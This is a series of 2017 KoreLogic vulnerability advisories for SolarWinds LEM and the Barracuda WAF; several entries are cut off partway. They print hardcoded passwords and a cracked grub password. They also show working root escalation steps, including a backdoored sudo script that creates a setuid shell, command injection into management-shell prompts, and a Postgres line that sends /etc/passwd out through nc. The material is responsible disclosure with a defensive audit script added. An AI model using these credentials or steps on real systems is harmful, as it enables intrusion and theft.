my $tls = "-Djavax.net.ssl.keyStore=/usr/local/contego/scripts/certs/.keystore -Djavax.net.ssl.keyStorePassword=q4ROVdYYsV5M -Djavax.net.ssl.trustStore=/usr/local/contego/scripts/certs/.truststore -Djavax.net.ssl.trustStorePassword=q4ROVdYYsV5M";
# grep -i "password" /usr/local/contego/run/manager.conf
PSQLPassword=aNErCbdTvwaXxnusqVsNCQ\=\=
ForensicPassword=BosMXyGmaT/ej+S3GU6fRQ\=\=
# grep -i "password" /var/rawdata/cores/solr.conf
query_password=tObzgVmmszuKGZ40W+PO/Q==
//hardcoded md5
# grep -i "password" /var/alertdata/hsql/alertdb.script
CREATE USER SA PASSWORD DIGEST 'fe42a787c40ad4110affab25e8bad4ae'
CREATE USER "trigeo" PASSWORD DIGEST '54837f887425d1eda4d0ddcee6c2d3fc'

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:

https://support.solarwinds.com/Success_Center/Log_Event_Manager_(LEM)/Log_and_Event_Manager_LEM_6-3-1_Hotfix_5_ReadMe
http://downloads.solarwinds.com/solarwinds/Release/HotFix/SolarWinds-LEM-v6.3.1-Hotfix5.zip

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. and Joshua Hardin.

6. Disclosure Timeline

2017.04.06 - KoreLogic submits vulnerability report and PoC to Solarwinds contact.
2017.05.15 - Solarwinds notifies KoreLogic that a hotfix addressing this issue will be available at the end of June.
2017.05.18 - 30 business days have elapsed since this issue was reported.
2017.06.09 - 45 business days have elapsed since this issue was reported.
2017.06.29 - Solarwinds releases hotfix.
2017.07.06 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
KL-001-2017-012 : Barracuda WAF Grub Password Complexity
Title: Barracuda WAF Grub Password Complexity
Advisory ID: KL-001-2017-012
Publication Date: 2017.07.06
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-012.txt

1. Vulnerability Details

Affected Vendor: Barracuda
Affected Product: Web Application Firewall V360
Affected Version: Firmware v8.0.1.014
Platform: Embedded Linux
CWE Classification: CWE-259: Use of Hard-coded Password
Impact: Privileged Access
Attack vector: Password Cracking

2. Vulnerability Description

The grub password for all V360 virtual appliances is four characters in length and, as a result, may be trivially easy to crack.

3. Technical Description

# grep "pbkdf2" grub.cfg
password_pbkdf2 root grub.pbkdf2.sha512.1.CA568B32B7E1F9A8ADC73224CD8AD1085B23FF5B69558D92E70961F4DEE3F5844CC4E3FC8FC4CBDB0941AC682B52DE64343F6847DF8AD480597B49EA65F48B41.0314A76ADA4989857110B3177617AECF8D38F99E417DCE2B1A289AD5F48C0DFC4969E76E10175399E8978DDE5DFD4B6E7EE808CD00CD6CA43512E92C2EB1D63A
# This hash cracks to: bimg

4. Mitigation and Remediation Recommendation

The vendor has patched this vulnerability in the latest virtual appliance release.

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. and Joshua Hardin.

6. Disclosure Timeline

2016.12.20 - KoreLogic sends vulnerability report and PoC to Barracuda.
2016.12.21 - Barracuda acknowledges receipt of the vulnerability report.
2017.01.09 - Barracuda informs KoreLogic that they are working on remediation for this issue.
2017.01.26 - Barracuda asks for additional time beyond the standard 45 business day embargo to address this and other issues reported by KoreLogic.
2017.02.27 - 45 business days have elapsed since the issue was reported.
2017.04.10 - 75 business days have elapsed since the issue was reported.
2017.05.15 - 100 business days have elapsed since the issue was reported.
2017.05.24 - Barracuda updates KoreLogic on the status of the remediation efforts.
2017.06.13 - 120 business days have elapsed since the issue was reported.
2017.06.27 - Barracuda informs KoreLogic that the issue has been fixed in the latest release of the WAF virtual appliance.
2017.07.06 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
KL-001-2017-011 : Barracuda WAF Internal Development Credential Disclosure
Title: Barracuda WAF Internal Development Credential Disclosure
Advisory ID: KL-001-2017-011
Publication Date: 2017.07.06
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-011.txt

1. Vulnerability Details

Affected Vendor: Barracuda
Affected Product: Web Application Firewall V360
Affected Version: Firmware v8.0.1.014
Platform: Embedded Linux
CWE Classification: CWE-489: Leftover Debug Code, CWE-200: Information Exposure
Impact: Privileged Access
Attack vector: Code Review

2. Vulnerability Description

Firmware reversing of the Barracuda Web Application Firewall uncovered development artifacts that should have been removed on the production images. Once the encryption scheme was broken, many QA and development tools were discovered on the affected partitions. Some of these contained sensitive information such as authentication credentials used by internal developers.

3. Technical Description

root@(none):/realroot/root# grep -ri "bospw" *|more
newfile/lib/Stub.pm:'BOSPW' => undef,
newfile/lib/Stub.pm:my $bospw = $self->_retrieve_bos_pw();
newfile/lib/Stub.pm:$self->_set_BOSPW($bospw);
newfile/lib/Stub.pm: my $bospw = Postbuild::get_bos_pw();
newfile/lib/Stub.pm: my $url = "https://$bospw\@ops.barracudanetworks.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$vm; platform=$platform=$bdvers";
newfile/lib/Stub.pm: $bospw = Postbuild::get_bos_pw();
newfile/lib/Stub.pm: $url = "https://$bospw\@ops.barracudanetworks.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$vm =$platform_country=$ship_code=$bdvers";
newfile/lib/Stub.pm:my $bospw;
newfile/lib/Stub.pm:if ( -f "/root/bospw" ) {
newfile/lib/Stub.pm:open IN, "/root/bospw";
newfile/lib/Stub.pm:$bospw = <IN>;
newfile/lib/Stub.pm:chomp($bospw);
newfile/lib/Stub.pm:$bospw = "manufacturing:N3rfH3rders";
newfile/lib/Stub.pm:return $bospw;
newfile/lib/Stub.pm:sub _get_BOSPW() {
newfile/lib/Stub.pm: return $self->{'BOSPW'};
newfile/lib/Stub.pm:sub _set_BOSPW() {
newfile/lib/Stub.pm:my ($self, $BOSPW) = @_;
newfile/lib/Stub.pm:$self->{'BOSPW'} = $BOSPW;
newfile/lib/Postbuild.pm:my $bospw = "manufacturing:N3rfH3rders";
newfile/lib/Postbuild.pm:if( -f "/root/bospw" ) {
newfile/lib/Postbuild.pm:open IN, "/root/bospw";
newfile/lib/Postbuild.pm:$bospw = <IN>;
newfile/lib/Postbuild.pm:chomp($bospw);
newfile/lib/Postbuild.pm:return $bospw;
newfile/lib/Postbuild.pm:my $bospw = get_bos_pw();
newfile/lib/Postbuild.pm: my $url = "https://$bospw\@ops.barracuda.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$vm atform=$platform=$bdvers";
newfile/lib/Postbuild.pm: $url = "https://$bospw\@ops.barracuda.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$ vm=$platform_country=$ship_code=$bdvers";
newfile/lib/Postbuild.pm:my $bospw = get_bos_pw();
newfile/lib/Postbuild.pm:my $url = "https://$bospw\@ops.barracudanetworks.com:443/~order/prod_void.cgi?void_serial=$serial;;
postbuild-code-platform-2.tar.gz.integrit:!/root/bospw
qaclear:unlink("/root/bospw");
qaclear.2:unlink("/root/bospw");
qapass:my @bospw = ("manufacturing:N3rfH3rders");
qapass:my $extrabospw = injectAndGet("__METHOD__://__POSTBUILDIP__/postbuild/files/os_updates2/root/bospw", { METHOD => [ "http", "https" ], POSTBUILDIP => [ "mfg-postbuild.englab.cudanet.local" ] }, 10 );
qapass:if( defined($extrabospw) ) {
qapass:unshift @bospw, split(/\n/, $extrabospw);
qapass:$url = "https://__BOSPW__\@__BOSIP__/~order/prod_accept.cgi?serial=$serial=$warehouse=$firmware;
qapass:$url = "https://__BOSPW__\@__BOSIP__/~order/prod_accept.cgi?serial=$serial=$firmware;;
qapass:if (!defined(injectAndGet($url, { BOSPW => \@bospw, BOSIP => \@bosip } ))) {
qapass:$url = "https://__BOSPW__\@__BOSIP__/cgi-bin/get_serial_status.cgi?serial=$serial;;
qapass:my $content = injectAndGet($url, { BOSPW => \@bospw, BOSIP => \@bosip } );
qapass:$url = "https://__BOSPW__\@__BOSIP__/cgi-bin/shipping.cgi?option=qadocs=1_label=1_loc=manufacturing=Print_id=$serial=$serial$loc_string;;
qapass:$url = "https://__BOSPW__\@__BOSIP__/cgi-bin/shipping.cgi?option=qadocs=1_label=1_code=1_loc=manufacturing=Print_id=$serial=$serial$loc_string;;
qapass:if( !defined(injectAndGet($url, { BOSPW => \@bospw, BOSIP => \@bosip })) ) {
qapass:$url =
KL-001-2017-009 : Solarwinds LEM Database Listener with Hardcoded Credentials
Title: Solarwinds LEM Database Listener with Hardcoded Credentials
Advisory ID: KL-001-2017-009
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-009.txt

1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-284: Improper Access Control
Impact: Remote Database Compromise
Attack vector: psql

2. Vulnerability Description

The Postgres database has default hardcoded credentials. While some security measures were taken to ensure that network connectivity to the Postgres database wouldn't be possible using IPv4, the same measures were not taken for IPv6.

3. Technical Description

Reviewing netstat for listening services shows that the postgres service is bound to both IPv4 and IPv6 interfaces.

--(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # netstat -apn|grep postgres
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 949/postgres
tcp6 0 0 :::5432 :::* LISTEN 949/postgres
udp 0 0 127.0.0.1:58654 127.0.0.1:58654 ESTABLISHED 949/postgres
unix 2 [ ACC ] STREAM LISTENING 4622 949/postgres /var/run/postgresql/.s.PGSQL.5432

An iptables REJECT entry exists for IPv4. This prevents remote network connectivity.

--(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # iptables -L|grep postgres
REJECT tcp -- anywhere !localhost tcp dpt:postgresql reject-with icmp-port-unreachable

However, there are no entries in the ip6tables at all, and the default policy is ACCEPT.

--(1)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # ip6tables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Additionally, two accounts exist with default and simple credentials.
--(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # head -n 5 /usr/local/contego/scripts/database/pgsql/flow.sql
CREATE ROLE trigeo WITH CREATEDB LOGIN PASSWORD 'rootme';
CREATE ROLE contego WITH CREATEDB LOGIN PASSWORD 'reports';
CREATE DATABASE alertdb WITH OWNER trigeo;
ALTER DATABASE alertdb OWNER TO trigeo;

No further testing was conducted against the Postgres service. However, the following may be possible.

1. Connect to Postgres using hardcoded credentials over IPv6.
2. Run CREATE OR REPLACE FUNCTION which ties to system() in libc.so.6. Example:

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS /lib/libc.so.6, system LANGUAGE C STRICT;
privSELECT system(cat /etc/passwd | nc 1.3.3.6 8080);

Example credit: http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet

3. Run system() calls to run commands on the underlying operating system as the postgres user.

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:
https://thwack.solarwinds.com/thread/111223

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwinds using PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability report.
2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

swi-lem$ ifconfig
eth0 Link encap:Ethernet HWaddr 52:54:00:12:34:56
inet addr:192.168.53.76 Bcast:192.168.53.255 Mask:255.255.255.0
inet6 addr: fe80::5054:ff:fe12:3456/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:681 errors:320 dropped:0 overruns:0
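The gap this advisory describes is easy to miss because IPv4 and IPv6 have separate rule tables. The following audit, an added example and not SolarWinds code, parses `netstat -apn` and `ip6tables -L` output (the sample text below is constructed from the listings above) and reports every tcp6 socket bound to the wildcard address that the INPUT chain neither rejects nor drops while its policy is ACCEPT. The `SERVICE_PORTS` map is a constructed fallback for the service names ip6tables prints when run without `-n`.

```python
"""Audit IPv6 exposure of listening services against the ip6tables INPUT chain.

Added example, not SolarWinds code. The sample netstat and ip6tables text below
is constructed from the advisory's listings; the functions take text so the
same check can run on captured `netstat -apn` and `ip6tables -L` output.
"""
import re
import socket

NETSTAT_SAMPLE = """\
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      949/postgres
tcp6       0      0 :::5432                 :::*                    LISTEN      949/postgres
tcp6       0      0 ::1:5433                :::*                    LISTEN      950/localonly
udp        0      0 127.0.0.1:58654         127.0.0.1:58654         ESTABLISHED 949/postgres
unix  2      [ ACC ]     STREAM     LISTENING     4622     949/postgres /var/run/postgresql/.s.PGSQL.5432
"""

IP6TABLES_SAMPLE = """\
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
"""

# ip6tables -L prints service names (e.g. dpt:postgresql) unless run with -n;
# this constructed map is the fallback when /etc/services is unavailable.
SERVICE_PORTS = {"postgresql": 5432, "ssh": 22, "http": 80, "https": 443}


def port_number(dpt_token):
    """Resolve a 'dpt:5432' or 'dpt:postgresql' token to an integer port (or None)."""
    name = dpt_token.split(":", 1)[1]
    if name.isdigit():
        return int(name)
    try:
        return socket.getservbyname(name)
    except OSError:
        return SERVICE_PORTS.get(name)


def parse_listeners(netstat_text):
    """Return (proto, bind_address, port, program) for each TCP socket in LISTEN."""
    listeners = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 7 or not parts[0].startswith("tcp") or parts[5] != "LISTEN":
            continue
        addr, port = parts[3].rsplit(":", 1)
        listeners.append((parts[0], addr, int(port), parts[6]))
    return listeners


def parse_input_chain(ip6tables_text):
    """Return (policy, ports rejected or dropped) for the INPUT chain."""
    policy, blocked, in_input = None, set(), False
    for line in ip6tables_text.splitlines():
        m = re.match(r"Chain (\S+) \(policy (\S+)\)", line)
        if m:
            in_input = m.group(1) == "INPUT"
            if in_input:
                policy = m.group(2)
            continue
        if not in_input or not line.strip() or line.startswith("target"):
            continue
        parts = line.split()
        if parts[0] in ("REJECT", "DROP"):
            for token in parts:
                if token.startswith("dpt:"):
                    port = port_number(token)
                    if port is not None:
                        blocked.add(port)
    return policy, blocked


def exposed_ipv6_listeners(netstat_text, ip6tables_text):
    """IPv6 wildcard (::) listeners that the INPUT chain neither rejects nor drops."""
    policy, blocked = parse_input_chain(ip6tables_text)
    exposed = []
    for proto, addr, port, program in parse_listeners(netstat_text):
        if proto != "tcp6" or addr != "::":
            continue  # IPv4 sockets and loopback-only (::1) binds are out of scope here
        if policy == "ACCEPT" and port not in blocked:
            exposed.append((port, program))
    return exposed


if __name__ == "__main__":
    for port, program in exposed_ipv6_listeners(NETSTAT_SAMPLE, IP6TABLES_SAMPLE):
        print(f"tcp6 port {port} ({program}) is reachable: INPUT policy ACCEPT, no rule")
```

On the appliance as shipped the check reports port 5432 for 949/postgres; once a REJECT or DROP rule for the port exists in ip6tables (or the chain policy is DROP) the same input yields nothing. A dual-stack listener should be reviewed against both tables every time the IPv4 rules change.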
KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read
Title: Solarwinds LEM Management Shell Arbitrary File Read
Advisory ID: KL-001-2017-008
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-008.txt

1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-36: Absolute Path Traversal
Impact: Information Disclosure
Attack vector: SSH

2. Vulnerability Description

The management shell allows the end user to edit the MOTD banner displayed during SSH logon. The editor provided for this is nano. This editor has a keyboard mapped function which lets the user import a file from the local file system into the editor. An attacker can abuse this to read arbitrary files within the allowed permissions.

3. Technical Description

Should an attacker gain access to the SSH console for the cmc user, read access to files on the local filesystem can be achieved. The default password for the cmc user is "password". This is accomplished by abusing the editor selection for the MOTD banner edit functionality.

$ ssh cmc@1.3.3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 11:35:29 2016 from 1.3.3.6
// /// SolarWinds Log & Event Manager /// /// management console /// //
Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH

Available commands:
[ appliance ] Network, System
[ manager ] Upgrade, Debug
[ service ] Restrictions, SSH, Snort
[ ndepth ] nDepth Configuration/Maintenance
upgrade Upgrade this Appliance
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
import Import a file that can be used from the Admin UI
help display this help
exit Exit

cmc > appliance
Available commands:
activate Activate appliance features after licensing.
checklogs Check Appliance Logs for Remote Data
clearsyslog Clear Syslog Logs
cleantemp * Clean Up Temporary Files
multimanagerconfig * Enable/disable multimanager
dateconfig Update Date and Time
dbdiskconfig * Configure database retention
diskusage Check Disk Usage of your Manager
diskusageconfig Set Disk Usage Limit of your Manager
editbanner Edit the SSH login banner.
exportsyslog Export System Logs
hostname Change the Manager Appliance hostname
import Import SIM/LEM Backup to LEM
limitsyslog Configure the syslog rotation limit (default: 50)
setlogrotate Configure the syslog rotation frequency (hourly or daily)
netconfig Configure Network Parameters (IP Address, Netmask, DNS)
ntpconfig Update NTP Server Preferences
password Change the CMC User Password
ping Ping an IP address or hostname
reboot Reboot the Manager Appliance
resetsystemmac Reset the MAC address of the Appliance
shutdown Shut Down the Manager Appliance
top View Manager Appliance CPU/Memory Utilization
tzconfig Update Time Zone information
viewnetconfig View Network Parameters (IP address, netmask, DNS)
exit Return to main menu
NOTE: Commands with an asterisk (*) include an automatic manager service restart

cmc::appliance > editbanner
Press to configure the SSH banner.

Once inside nano, ^R to get the screen below:

File to insert [from ./] : /etc/passwd
^G Get Help ^C Cancel

The result will be:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System
KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection
Title: Solarwinds LEM Management Shell Escape via Command Injection
Advisory ID: KL-001-2017-007
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt

1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command
Impact: Privileged Access
Attack vector: SSH

2. Vulnerability Description

Insufficient input validation in the management interface can be leveraged in order to execute arbitrary commands. This can lead to (root) shell access to the underlying operating system.

3. Technical Description

Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password". This report details two distinct attack vectors: the username input during SNMP setup and the destination email input during debug.

= SNMP =

This is accomplished by placing `/bin/bash` in the username input during SNMP server setup.

$ ssh cmc@1.3.3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6
// /// SolarWinds Log & Event Manager /// /// management console /// //
Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH

Available commands:
[ appliance ] Network, System
[ manager ] Upgrade, Debug
[ service ] Restrictions, SSH, Snort
[ ndepth ] nDepth Configuration/Maintenance
upgrade Upgrade this Appliance
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
import Import a file that can be used from the Admin UI
help display this help
exit Exit

cmc > service
Available commands:
startssh Start the SSH Service
stopssh Stop the SSH Service
restartssh Restart the SSH Service
restrictssh Restrict Access to the SSH Service (by IP Address/hostname)
unrestrictssh Remove Restrictions on Access to the SSH Service
snmp Configure the SNMP Services
copysnortrules Copy Snort rules to floppy or network share
loadsnortrules Load Snort rules from floppy or network share
loadsnortbackup Load Snort rules from backup
restartsnort Restart the Snort Service
enableflow * Enable the flow Collection Service
disableflow Disable the flow Collection Service
restrictconsole Restrict Access to the Manager Console (GUI) by IP/hostname
unrestrictconsole Remove Restrictions on Access to the Console (GUI)
restrictreports Restrict Access to Reports by IP/hostname
unrestrictreports Remove Restrictions on Access to Reports
stopopsec Stop all running OPSEC LEA client connections
help display this help
exit Return to main menu
NOTE: Commands with an asterisk (*) include an automatic manager service restart

cmc::service > snmp
SNMP Trap Logging Service is RUNNNING
Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y
SNMP Request Service is RUNNNING
Would you like to STOP the SNMP Request Service? [Y/n] Y
The SNMP Trap Logging Service is stopped.
The SNMP Request Service is stopped.

cmc::service > snmp
SNMP Trap Logging Service is DISABLED
Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y
SNMP Request Service is DISABLED
Would you like to ENABLE the SNMP Request Service? [Y/n] Y
Enter the port number to access SNMP on LEM (default: 161):
Enter the username to access SNMP on LEM (default: orion): `/bin/bash`
Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):
Enter the authentication password (default: orion123):
Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):
Enter the encryption key (default: orion123):
cmc@swi-lem:/usr/local/contego$

= Debug =

This is accomplished by placing `/bin/bash` in the destination email input during debug.

$ ssh
KL-001-2017-006 : Solarwinds LEM Privilege Escalation via Sudo Script Abuse
Title: Solarwinds LEM Privilege Escalation via Sudo Script Abuse
Advisory ID: KL-001-2017-006
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-006.txt

1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-269: Improper Privilege Management
Impact: Privileged Access
Attack vector: SSH

2. Vulnerability Description

An attacker can abuse functionality provided by a script which may be run with root privilege in order to elevate privilege.

3. Technical Description

Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password". The cmc account can run certain script files with root privilege. Listed below:

cmc ALL=(ALL) NOPASSWD: /usr/local/contego/scripts/activate.pl,
 /usr/local/contego/scripts/apply_hotfix,
 /usr/local/contego/scripts/cleantemp.pl,
 /usr/local/contego/scripts/contego-archive,
 /usr/local/contego/scripts/contego-backup,
 /usr/local/contego/scripts/contego-logbackup,
 /usr/local/contego/scripts/debugdump.pl,
 /usr/local/contego/scripts/disable_ipv6.sh,
 /usr/local/contego/scripts/exportsyslog.pl,
 /usr/local/contego/scripts/hostname.sh,
 /usr/local/contego/scripts/ipchains_restore.sh,
 /usr/local/contego/scripts/managerReset.pl,
 /usr/local/contego/scripts/mountshare.sh,
 /usr/local/contego/scripts/mountsolr.pl,
 /usr/local/contego/scripts/netconfig.sh,
 /usr/local/contego/scripts/opseccontrol.sh,
 /usr/local/contego/scripts/rcc.pl,
 /usr/local/contego/scripts/setupCert.sh,
 /usr/local/contego/scripts/sim2lem.pl,
 /usr/local/contego/scripts/snortcontrol.sh,
 /usr/local/contego/scripts/sshcontrol.sh,
 /usr/local/contego/scripts/swi_login_update.pl,
 /usr/local/contego/scripts/timecontrol.sh,
 /usr/local/contego/scripts/upgrade.pl,
 /usr/local/contego/scripts/upgrade21.sh,
 /usr/local/contego/scripts/upgrade_bootloader.sh,
 /usr/local/contego/scripts/recovery.py,
 /sbin/shutdown,
 /usr/bin/lem/lynx-admin-ui

One script, upgrade21.sh, allows the user to change ownership and permission bits for an arbitrary file. This can be abused to elevate privilege to root.

cmc@swi-lem:/usr/local/contego/scripts$ cp /bin/dash /tmp/koresh
cmc@swi-lem:/usr/local/contego/scripts$ sudo ./upgrade21.sh setperms /tmp/koresh root root 4755
sudo: unable to resolve host swi-lem
cmc@swi-lem:/usr/local/contego/scripts$ /tmp/koresh
# id
uid=1001(cmc) gid=1000(trigeo) euid=0(root) groups=0(root),4(adm),24(cdrom),25(floppy),104(postgres),105(snort),1000(trigeo),1002(dbadmin)

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:
https://thwack.solarwinds.com/thread/111223

5. Credit

This vulnerability was discovered by Hank Leininger and Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwinds using PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability report.
2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our
KL-001-2017-005 : Solarwinds LEM Privilege Escalation via Controlled Sudo Path
Title: Solarwinds LEM Privilege Escalation via Controlled Sudo Path
Advisory ID: KL-001-2017-005
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-005.txt

1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-281: Improper Preservation of Permissions, CWE-708: Incorrect Ownership Assignment
Impact: Privileged Access
Attack vector: SSH

2. Vulnerability Description

Due to lax filesystem permissions, an attacker can take control of a hardcoded sudo path in order to execute commands as a privileged user.

3. Technical Description

Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password". Due to underlying filesystem permissions, it is possible for the cmc user to assume control of a path hardcoded in the sudoers file.

The attack is started by moving the scripts directory and creating a symlink to a (now) attacker controlled scripts directory.

cmc@swi-lem:/usr/local/contego$ mv scripts scripts.real && mkdir scripts && cd scripts.real && for A in * ; do ln -s ../scripts.real/${A} ../scripts/${A} ; done

Next, a file specified in the sudoers file is overwritten and then executed using sudo.

cmc@swi-lem:/usr/local/contego/scripts$ diff -u hostname.sh hostname.sh.backdoor
--- hostname.sh 2005-07-01 20:10:17.0 -0700
+++ hostname.sh.backdoor 2016-12-11 12:20:35.0 -0800
@@ -1,5 +1,10 @@
 #!/bin/sh
+# create a backdoor setuid shell
+cp /bin/dash /tmp/sushi
+chown root:root /tmp/sushi
+chmod 4755 /tmp/sushi
+
[snip]
cmc@swi-lem:/usr/local/contego/scripts$ rm hostname.sh && mv -i hostname.sh.backdoor hostname.sh
cmc@swi-lem:/usr/local/contego$ sudo /usr/local/contego/scripts/hostname.sh

This results in a suid dash shell being output to /tmp/sushi.

cmc@swi-lem:/usr/local/contego$ ls -ld /tmp/sushi
-rwsr-xr-x 1 root root 104168 Dec 11 12:21 /tmp/sushi

Running this shell results in root privileges.

cmc@swi-lem:/usr/local/contego$ /tmp/sushi
# id
uid=1001(cmc) gid=1000(trigeo) euid=0(root) groups=0(root),4(adm),24(cdrom),25(floppy),104(postgres),105(snort),1000(trigeo),1002(dbadmin)

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:
https://thwack.solarwinds.com/thread/111223

5. Credit

